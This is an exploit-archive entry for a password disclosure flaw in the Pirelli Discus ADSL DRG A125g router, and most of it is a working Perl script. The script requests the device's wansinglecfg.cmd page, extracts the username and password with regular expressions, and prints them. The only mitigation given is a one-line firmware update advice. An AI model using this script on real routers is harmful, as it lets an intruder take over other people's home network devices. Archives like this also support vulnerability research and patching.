Pirelli Discus ADSL DRG A125g Password Disclosure

vendor:

Discus ADSL DRG A125g

by:

Sebastián Magof

7,5

CVSS

HIGH

Password Disclosure

200

CWE

Product Name: Discus ADSL DRG A125g

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: Yes

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Pirelli Discus ADSL DRG A125g Password Disclosure

This exploit is used to disclose the password of Pirelli Discus ADSL DRG A125g. It uses LWP::UserAgent and HTTP::Request to send a GET request to the vulnerable file wansinglecfg.cmd. The content of the response is parsed to extract the username and password.

Mitigation:

The user should update the firmware of the device to the latest version.

Source

Exploit-DB raw data:

#!/usr/bin/perl 
#Author: Sebastián Magof
#Vulnerable file: wansinglecfg.cmd
#Bug: Password Disclosure
# (\/)
# (**) αlpha
#(")(")
#usage:perl exploit.pl
use LWP::UserAgent;
use HTTP::Request;
#begin
print "\n\n*******************************************************\n";
print "*  Pirelli Discus ADSL DRG A125g password disclosure  *\n";
print "*******************************************************\n\n";
print "[+] Type your Gateway. (#default gateway 10.0.0.2) : "; #10.0.0.2 default Gateway
$gateway =<STDIN>;

#pwd disclosure file
my $url = "http://$gateway/wansinglecfg.cmd?action=view";

#UserAgent
my $ua = LWP::UserAgent->new();
$ua->agent("Mozilla/5.0");

#Request.
my $req = HTTP::Request->new(GET => $url);
my $request = $ua->request($req);
my $content = $request->content(); #content
my ($usr) = $content =~ m/frmLoad\('(.+)', '/;
my ($pwd) = $content =~ m/$usr', '(.+)',/;

#usr+pwd;
print "User: $usr\nPassword: $pwd\n\n";
exit(0);

__EOF__